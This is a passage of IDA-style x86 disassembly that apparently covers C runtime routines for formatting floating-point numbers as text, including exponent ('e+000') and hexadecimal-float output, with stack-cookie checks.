mov [ecx], dl
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_410845: ; CODE XREF: sub_4107CD+50�j
; sub_4107CD+58�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 82h
or dl, 2
jmp short loc_410841
; ---------------------------------------------------------------------------
loc_410859: ; CODE XREF: sub_4107CD+48�j
and byte ptr [ecx+4], 7Fh
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_41085F: ; CODE XREF: sub_4107CD+40�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
and byte ptr [ecx], 80h
loc_41086C: ; CODE XREF: sub_4107CD+60�j
; sub_4107CD+76�j ...
cmp [ebp+arg_0], 0
jnz short loc_410879
mov eax, 8000h
jmp short loc_410884
; ---------------------------------------------------------------------------
loc_410879: ; CODE XREF: sub_4107CD+A3�j
neg eax
sbb eax, eax
and eax, 0C000h
add eax, edi
loc_410884: ; CODE XREF: sub_4107CD+AA�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4107CD endp
; =============== S U B R O U T I N E =======================================
sub_410889 proc near ; CODE XREF: sub_40E072+40�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_4108B1
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4108B1: ; CODE XREF: sub_410889+9�j
mov ecx, ds:dword_426560
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_410889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108BD proc near ; CODE XREF: sub_410A38+6�p
; DATA XREF: sub_40F70B+55�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov esi, [ebp+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 65h
jmp short loc_4108EC
; ---------------------------------------------------------------------------
loc_4108E0: ; CODE XREF: sub_4108BD+30�j
inc esi
movzx eax, byte ptr [esi]
push eax
call sub_40F17F
test eax, eax
loc_4108EC: ; CODE XREF: sub_4108BD+21�j
pop ecx
jnz short loc_4108E0
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 78h
pop ecx
jnz short loc_410900
inc esi
inc esi
loc_410900: ; CODE XREF: sub_4108BD+3F�j
mov ecx, [ebp+var_10]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov al, [esi]
mov cl, [ecx]
mov [esi], cl
inc esi
loc_410912: ; CODE XREF: sub_4108BD+60�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_410912
cmp [ebp+var_4], cl
pop esi
jz short locret_41092C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_41092C: ; CODE XREF: sub_4108BD+66�j
leave
retn
sub_4108BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41092E proc near ; CODE XREF: sub_410A46+6�p
; DATA XREF: sub_40F70B+4B�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+arg_0]
mov cl, [eax]
test cl, cl
mov esi, [ebp+var_10]
jz short loc_410961
mov edx, [esi+0BCh]
mov edx, [edx]
mov dl, [edx]
loc_410956: ; CODE XREF: sub_41092E+31�j
cmp cl, dl
jz short loc_410961
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_410956
loc_410961: ; CODE XREF: sub_41092E+1C�j
; sub_41092E+2A�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41099E
jmp short loc_410975
; ---------------------------------------------------------------------------
loc_41096A: ; CODE XREF: sub_41092E+4B�j
cmp cl, 65h
jz short loc_41097B
cmp cl, 45h
jz short loc_41097B
inc eax
loc_410975: ; CODE XREF: sub_41092E+3A�j
mov cl, [eax]
test cl, cl
jnz short loc_41096A
loc_41097B: ; CODE XREF: sub_41092E+3F�j
; sub_41092E+44�j
mov edx, eax
loc_41097D: ; CODE XREF: sub_41092E+53�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41097D
mov ecx, [esi+0BCh]
mov ecx, [ecx]
push ebx
mov bl, [eax]
cmp bl, [ecx]
pop ebx
jnz short loc_410994
dec eax
loc_410994: ; CODE XREF: sub_41092E+63�j
; sub_41092E+6E�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_410994
loc_41099E: ; CODE XREF: sub_41092E+38�j
cmp [ebp+var_4], 0
pop esi
jz short locret_4109AC
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_4109AC: ; CODE XREF: sub_41092E+75�j
leave
retn
sub_41092E endp
; ---------------------------------------------------------------------------
word_4109AE dw 0EED9h ; DATA XREF: sub_40F70B+28�o
dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109C4 proc near ; CODE XREF: sub_410A04+E�p
; DATA XREF: sub_40F70B+41�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_C]
push [ebp+arg_8]
jz short loc_4109EE
lea eax, [ebp+var_8]
push eax
call sub_4114AD
mov ecx, [ebp+var_8]
mov eax, [ebp+arg_4]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
jmp short loc_4109FF
; ---------------------------------------------------------------------------
loc_4109EE: ; CODE XREF: sub_4109C4+F�j
lea eax, [ebp+arg_0]
push eax
call sub_411553
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_4109FF: ; CODE XREF: sub_4109C4+28�j
add esp, 0Ch
leave
retn
sub_4109C4 endp
; =============== S U B R O U T I N E =======================================
sub_410A04 proc near ; DATA XREF: sub_40F70B+14�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4109C4
add esp, 10h
retn
sub_410A04 endp
; =============== S U B R O U T I N E =======================================
sub_410A1B proc near ; CODE XREF: sub_410A54+88�p
; sub_41101E+8A�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_410A36
push esi
call sub_404130
inc eax
push eax
push esi
add esi, edi
push esi
call sub_407370
add esp, 10h
loc_410A36: ; CODE XREF: sub_410A1B+5�j
pop esi
retn
sub_410A1B endp
; =============== S U B R O U T I N E =======================================
sub_410A38 proc near ; DATA XREF: sub_40F70B+1E�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_4108BD
pop ecx
pop ecx
retn
sub_410A38 endp
; =============== S U B R O U T I N E =======================================
sub_410A46 proc near ; DATA XREF: sub_40F70B+A�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_41092E
pop ecx
pop ecx
retn
sub_410A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A54 proc near ; CODE XREF: sub_410BC1+B7�p
; sub_4111CC+E1�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_10]
mov ebx, eax
call sub_40271F
xor esi, esi
cmp ebx, esi
jnz short loc_410A9B
loc_410A70: ; CODE XREF: sub_410A54+4A�j
call sub_4057D3
push 16h
loc_410A77: ; CODE XREF: sub_410A54+67�j
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_410A94
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410A94: ; CODE XREF: sub_410A54+37�j
mov eax, edi
jmp loc_410BBC
; ---------------------------------------------------------------------------
loc_410A9B: ; CODE XREF: sub_410A54+1A�j
cmp [ebp+arg_0], esi
jbe short loc_410A70
cmp [ebp+arg_4], esi
jle short loc_410AAA
mov eax, [ebp+arg_4]
jmp short loc_410AAC
; ---------------------------------------------------------------------------
loc_410AAA: ; CODE XREF: sub_410A54+4F�j
xor eax, eax
loc_410AAC: ; CODE XREF: sub_410A54+54�j
add eax, 9
cmp [ebp+arg_0], eax
ja short loc_410ABD
call sub_4057D3
push 22h
jmp short loc_410A77
; ---------------------------------------------------------------------------
loc_410ABD: ; CODE XREF: sub_410A54+5E�j
cmp [ebp+arg_10], 0
jz short loc_410AE1
mov edx, [ebp+arg_C]
xor eax, eax
cmp [ebp+arg_4], esi
setnle al
xor ecx, ecx
cmp dword ptr [edx], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_410A1B
loc_410AE1: ; CODE XREF: sub_410A54+6D�j
mov edi, [ebp+arg_C]
cmp dword ptr [edi], 2Dh
mov esi, ebx
jnz short loc_410AF1
mov byte ptr [ebx], 2Dh
lea esi, [ebx+1]
loc_410AF1: ; CODE XREF: sub_410A54+95�j
cmp [ebp+arg_4], 0
jle short loc_410B0F
lea eax, [esi+1]
mov cl, [eax]
mov [esi], cl
mov esi, eax
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
loc_410B0F: ; CODE XREF: sub_410A54+A1�j
xor eax, eax
cmp [ebp+arg_10], al
setz al
add eax, [ebp+arg_4]
add esi, eax
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_410B27
or ebx, 0FFFFFFFFh
jmp short loc_410B2C
; ---------------------------------------------------------------------------
loc_410B27: ; CODE XREF: sub_410A54+CC�j
sub ebx, esi
add ebx, [ebp+arg_0]
loc_410B2C: ; CODE XREF: sub_410A54+D1�j
push offset aE000 ; "e+000"
push ebx
push esi
call sub_4076D5
add esp, 0Ch
xor ebx, ebx
test eax, eax
jz short loc_410B4E
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_410B4E: ; CODE XREF: sub_410A54+EB�j
cmp [ebp+arg_8], ebx
lea ecx, [esi+2]
jz short loc_410B59
mov byte ptr [esi], 45h
loc_410B59: ; CODE XREF: sub_410A54+100�j
mov eax, [edi+0Ch]
inc esi
cmp byte ptr [eax], 30h
jz short loc_410B90
mov eax, [edi+4]
dec eax
jns short loc_410B6D
neg eax
mov byte ptr [esi], 2Dh
loc_410B6D: ; CODE XREF: sub_410A54+112�j
inc esi
cmp eax, 64h
jl short loc_410B7D
cdq
push 64h
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B7D: ; CODE XREF: sub_410A54+11D�j
inc esi
cmp eax, 0Ah
jl short loc_410B8D
cdq
push 0Ah
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B8D: ; CODE XREF: sub_410A54+12D�j
add [esi+1], al
loc_410B90: ; CODE XREF: sub_410A54+10C�j
test ds:byte_426564, 1
jz short loc_410BAD
cmp byte ptr [ecx], 30h
jnz short loc_410BAD
push 3
lea eax, [ecx+1]
push eax
push ecx
call sub_407370
add esp, 0Ch
loc_410BAD: ; CODE XREF: sub_410A54+143�j
; sub_410A54+148�j
cmp [ebp+var_4], 0
jz short loc_410BBA
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410BBA: ; CODE XREF: sub_410A54+15D�j
xor eax, eax
loc_410BBC: ; CODE XREF: sub_410A54+42�j
pop edi
pop esi
pop ebx
leave
retn
sub_410A54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BC1 proc near ; CODE XREF: sub_410C8F+14�p
; sub_4112C4+7C�p
var_2C = dword ptr -2Ch
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_410C11
loc_410BF9: ; CODE XREF: sub_410BC1+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C11: ; CODE XREF: sub_410BC1+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_410BF9
cmp eax, 0FFFFFFFFh
mov esi, [ebp+arg_C]
jnz short loc_410C25
or eax, 0FFFFFFFFh
jmp short loc_410C39
; ---------------------------------------------------------------------------
loc_410C25: ; CODE XREF: sub_410BC1+5D�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
xor ecx, ecx
cmp esi, ebx
setnle cl
sub eax, ecx
loc_410C39: ; CODE XREF: sub_410BC1+62�j
lea ecx, [ebp+var_2C]
push ecx
lea ecx, [esi+1]
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
xor ecx, ecx
cmp esi, ebx
setnle cl
add eax, edi
add ecx, eax
push ecx
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_410C67
mov [edi], bl
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C67: ; CODE XREF: sub_410BC1+A0�j
push [ebp+arg_14]
lea eax, [ebp+var_2C]
push ebx
push eax
push [ebp+arg_10]
mov eax, edi
push esi
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_410C80: ; CODE XREF: sub_410BC1+4E�j
; sub_410BC1+A4�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_410BC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C8F proc near ; CODE XREF: sub_410CAD+BD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
add esp, 18h
pop ebp
retn
sub_410C8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CAD proc near ; CODE XREF: sub_4112C4+63�p
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_24]
mov [ebp+var_14], 3FFh
xor edi, edi
mov [ebp+var_4], 30h
call sub_40271F
cmp [ebp+arg_C], edi
jge short loc_410CD8
mov [ebp+arg_C], edi
loc_410CD8: ; CODE XREF: sub_410CAD+26�j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_410D0A
loc_410CDF: ; CODE XREF: sub_410CAD+60�j
call sub_4057D3
push 16h
loc_410CE6: ; CODE XREF: sub_410CAD+77�j
pop esi
push edi
push edi
push edi
push edi
push edi
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_18], 0
jz short loc_410D03
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410D03: ; CODE XREF: sub_410CAD+4D�j
mov eax, esi
jmp loc_41101A
; ---------------------------------------------------------------------------
loc_410D0A: ; CODE XREF: sub_410CAD+30�j
cmp [ebp+arg_8], edi
jbe short loc_410CDF
mov eax, [ebp+arg_C]
add eax, 0Bh
cmp [ebp+arg_8], eax
mov byte ptr [esi], 0
ja short loc_410D26
call sub_4057D3
push 22h
jmp short loc_410CE6
; ---------------------------------------------------------------------------
loc_410D26: ; CODE XREF: sub_410CAD+6E�j
mov edi, [ebp+arg_0]
mov eax, [edi]
mov [ebp+var_C], eax
mov eax, [edi+4]
mov ecx, eax
shr ecx, 14h
mov edx, 7FFh
push ebx
and ecx, edx
xor ebx, ebx
cmp ecx, edx
jnz loc_410DD8
test ebx, ebx
jnz loc_410DD8
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jnz short loc_410D5C
or eax, eax
jmp short loc_410D5F
; ---------------------------------------------------------------------------
loc_410D5C: ; CODE XREF: sub_410CAD+A9�j
add eax, 0FFFFFFFEh
loc_410D5F: ; CODE XREF: sub_410CAD+AD�j
push 0
push [ebp+arg_C]
lea ebx, [esi+2]
push eax
push ebx
push edi
call sub_410C8F
add esp, 14h
test eax, eax
jz short loc_410D8F
cmp [ebp+var_18], 0
mov byte ptr [esi], 0
jz loc_411019
mov ecx, [ebp+var_1C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_411019
; ---------------------------------------------------------------------------
loc_410D8F: ; CODE XREF: sub_410CAD+C7�j
cmp byte ptr [ebx], 2Dh
jnz short loc_410D98
mov byte ptr [esi], 2Dh
inc esi
loc_410D98: ; CODE XREF: sub_410CAD+E5�j
mov byte ptr [esi], 30h
inc esi
cmp [ebp+arg_10], 0
push 65h
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
inc esi
push esi
call sub_411480
test eax, eax
pop ecx
pop ecx
jz loc_41100A
cmp [ebp+arg_10], 0
setz cl
dec cl
and cl, 0E0h
add cl, 70h
mov [eax], cl
mov byte ptr [eax+3], 0
jmp loc_41100A
; ---------------------------------------------------------------------------
loc_410DD8: ; CODE XREF: sub_410CAD+95�j
; sub_410CAD+9D�j
and eax, 80000000h
xor ecx, ecx
or ecx, eax
jz short loc_410DE7
mov byte ptr [esi], 2Dh
inc esi
loc_410DE7: ; CODE XREF: sub_410CAD+134�j
mov ebx, [ebp+arg_10]
mov byte ptr [esi], 30h
inc esi
test ebx, ebx
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
mov ecx, [edi+4]
inc esi
neg ebx
sbb ebx, ebx
and ebx, 0FFFFFFE0h
and ecx, 7FF00000h
xor eax, eax
add ebx, 27h
xor edx, edx
or eax, ecx
jnz short loc_410E38
mov byte ptr [esi], 30h
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
inc esi
or eax, ecx
jnz short loc_410E2F
mov [ebp+var_14], edx
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E2F: ; CODE XREF: sub_410CAD+17B�j
mov [ebp+var_14], 3FEh
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E38: ; CODE XREF: sub_410CAD+168�j
mov byte ptr [esi], 31h
inc esi
loc_410E3C: ; CODE XREF: sub_410CAD+180�j
; sub_410CAD+189�j
mov eax, esi
inc esi
cmp [ebp+arg_C], edx
mov [ebp+arg_4], eax
jnz short loc_410E4B
mov [eax], dl
jmp short loc_410E5A
; ---------------------------------------------------------------------------
loc_410E4B: ; CODE XREF: sub_410CAD+198�j
mov ecx, [ebp+var_24]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov cl, [ecx]
mov [eax], cl
loc_410E5A: ; CODE XREF: sub_410CAD+19C�j
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
mov [ebp+var_8], ecx
ja short loc_410E72
cmp eax, edx
jbe loc_410F27
loc_410E72: ; CODE XREF: sub_410CAD+1BB�j
mov [ebp+var_C], edx
mov [ebp+var_8], 0F0000h
loc_410E7C: ; CODE XREF: sub_410CAD+220�j
cmp [ebp+arg_C], 0
jle short loc_410ECF
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
add ax, 30h
movzx eax, ax
cmp ax, 39h
jbe short loc_410EAB
add eax, ebx
loc_410EAB: ; CODE XREF: sub_410CAD+1FA�j
mov ecx, [ebp+var_8]
sub [ebp+var_4], 4
mov [esi], al
mov eax, [ebp+var_C]
shrd eax, ecx, 4
shr ecx, 4
inc esi
dec [ebp+arg_C]
cmp word ptr [ebp+var_4], 0
mov [ebp+var_C], eax
mov [ebp+var_8], ecx
jge short loc_410E7C
loc_410ECF: ; CODE XREF: sub_410CAD+1D3�j
cmp word ptr [ebp+var_4], 0
jl short loc_410F27
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
cmp ax, 8
jbe short loc_410F27
lea eax, [esi-1]
loc_410EF9: ; CODE XREF: sub_410CAD+25C�j
mov cl, [eax]
cmp cl, 66h
jz short loc_410F05
cmp cl, 46h
jnz short loc_410F0B
loc_410F05: ; CODE XREF: sub_410CAD+251�j
mov byte ptr [eax], 30h
dec eax
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F0B: ; CODE XREF: sub_410CAD+256�j
cmp eax, [ebp+arg_4]
jz short loc_410F24
mov cl, [eax]
cmp cl, 39h
jnz short loc_410F1E
add bl, 3Ah
mov [eax], bl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F1E: ; CODE XREF: sub_410CAD+268�j
inc cl
mov [eax], cl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F24: ; CODE XREF: sub_410CAD+261�j
inc byte ptr [eax-1]
loc_410F27: ; CODE XREF: sub_410CAD+1BF�j
; sub_410CAD+227�j ...
cmp [ebp+arg_C], 0
jle short loc_410F3E
push [ebp+arg_C]
push 30h
push esi
call sub_407B70
add esp, 0Ch
add esi, [ebp+arg_C]
loc_410F3E: ; CODE XREF: sub_410CAD+27E�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_410F48
mov esi, eax
loc_410F48: ; CODE XREF: sub_410CAD+297�j
cmp [ebp+arg_10], 0
mov cl, 34h
setz al
dec al
and al, 0E0h
add al, 70h
mov [esi], al
mov eax, [edi]
mov edx, [edi+4]
inc esi
call sub_4118E0
xor ebx, ebx
and eax, 7FFh
and edx, ebx
sub eax, [ebp+var_14]
push ebx
pop ecx
sbb edx, ecx
js short loc_410F82
jg short loc_410F7C
cmp eax, ebx
jb short loc_410F82
loc_410F7C: ; CODE XREF: sub_410CAD+2C9�j
mov byte ptr [esi], 2Bh
inc esi
jmp short loc_410F8C
; ---------------------------------------------------------------------------
loc_410F82: ; CODE XREF: sub_410CAD+2C7�j
; sub_410CAD+2CD�j
mov byte ptr [esi], 2Dh
inc esi
neg eax
adc edx, ebx
neg edx
loc_410F8C: ; CODE XREF: sub_410CAD+2D3�j
cmp edx, ebx
mov edi, esi
mov byte ptr [esi], 30h
jl short loc_410FB9
mov ecx, 3E8h
jg short loc_410FA0
cmp eax, ecx
jb short loc_410FB9
loc_410FA0: ; CODE XREF: sub_410CAD+2ED�j
push ebx
push ecx
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
inc esi
cmp esi, edi
mov [ebp+var_10], edx
mov eax, ecx
mov edx, ebx
jnz short loc_410FC4
loc_410FB9: ; CODE XREF: sub_410CAD+2E6�j
; sub_410CAD+2F1�j
test edx, edx
jl short loc_410FDB
jg short loc_410FC4
cmp eax, 64h
jb short loc_410FDB
loc_410FC4: ; CODE XREF: sub_410CAD+30A�j
; sub_410CAD+310�j
push 0
push 64h
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov edx, ebx
loc_410FDB: ; CODE XREF: sub_410CAD+30E�j
; sub_410CAD+315�j
cmp esi, edi
jnz short loc_410FEA
test edx, edx
jl short loc_411002
jg short loc_410FEA
cmp eax, 0Ah
jb short loc_411002
loc_410FEA: ; CODE XREF: sub_410CAD+330�j
; sub_410CAD+336�j
push 0
push 0Ah
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov [ebp+var_10], ebx
loc_411002: ; CODE XREF: sub_410CAD+334�j
; sub_410CAD+33B�j
add al, 30h
mov [esi], al
mov byte ptr [esi+1], 0
loc_41100A: ; CODE XREF: sub_410CAD+10B�j
; sub_410CAD+126�j
cmp [ebp+var_18], 0
jz short loc_411017
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411017: ; CODE XREF: sub_410CAD+361�j
xor eax, eax
loc_411019: ; CODE XREF: sub_410CAD+D0�j
; sub_410CAD+DD�j
pop ebx
loc_41101A: ; CODE XREF: sub_410CAD+58�j
pop edi
pop esi
leave
retn
sub_410CAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41101E proc near ; CODE XREF: sub_411113+A2�p
; sub_4111CC+C3�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_C]
mov ebx, eax
mov esi, [ebx+4]
mov edi, ecx
lea ecx, [ebp+var_10]
dec esi
call sub_40271F
test edi, edi
jnz short loc_41106B
loc_41103E: ; CODE XREF: sub_41101E+51�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_411064
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411064: ; CODE XREF: sub_41101E+3D�j
mov eax, esi
jmp loc_41110E
; ---------------------------------------------------------------------------
loc_41106B: ; CODE XREF: sub_41101E+1E�j
cmp [ebp+arg_0], 0
jbe short loc_41103E
cmp [ebp+arg_8], 0
jz short loc_41108F
cmp esi, [ebp+arg_4]
jnz short loc_41108F
xor eax, eax
cmp dword ptr [ebx], 2Dh
setz al
add eax, esi
add eax, edi
mov byte ptr [eax], 30h
mov byte ptr [eax+1], 0
loc_41108F: ; CODE XREF: sub_41101E+57�j
; sub_41101E+5C�j
cmp dword ptr [ebx], 2Dh
mov esi, edi
jnz short loc_41109C
mov byte ptr [edi], 2Dh
lea esi, [edi+1]
loc_41109C: ; CODE XREF: sub_41101E+76�j
mov eax, [ebx+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_4110B3
mov eax, esi
call sub_410A1B
mov byte ptr [esi], 30h
inc esi
jmp short loc_4110B5
; ---------------------------------------------------------------------------
loc_4110B3: ; CODE XREF: sub_41101E+86�j
add esi, eax
loc_4110B5: ; CODE XREF: sub_41101E+93�j
cmp [ebp+arg_4], 0
jle short loc_4110FF
mov eax, esi
call sub_410A1B
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
mov ebx, [ebx+4]
inc esi
test ebx, ebx
jge short loc_4110FF
neg ebx
cmp [ebp+arg_8], 0
jnz short loc_4110E6
cmp [ebp+arg_4], ebx
jl short loc_4110E9
loc_4110E6: ; CODE XREF: sub_41101E+C1�j
mov [ebp+arg_4], ebx
loc_4110E9: ; CODE XREF: sub_41101E+C6�j
mov edi, [ebp+arg_4]
mov eax, esi
call sub_410A1B
push edi
push 30h
push esi
call sub_407B70
add esp, 0Ch
loc_4110FF: ; CODE XREF: sub_41101E+9B�j
; sub_41101E+B9�j
cmp [ebp+var_4], 0
jz short loc_41110C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_41110C: ; CODE XREF: sub_41101E+E5�j
xor eax, eax
loc_41110E: ; CODE XREF: sub_41101E+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_41101E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411113 proc near ; CODE XREF: sub_4112C4+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
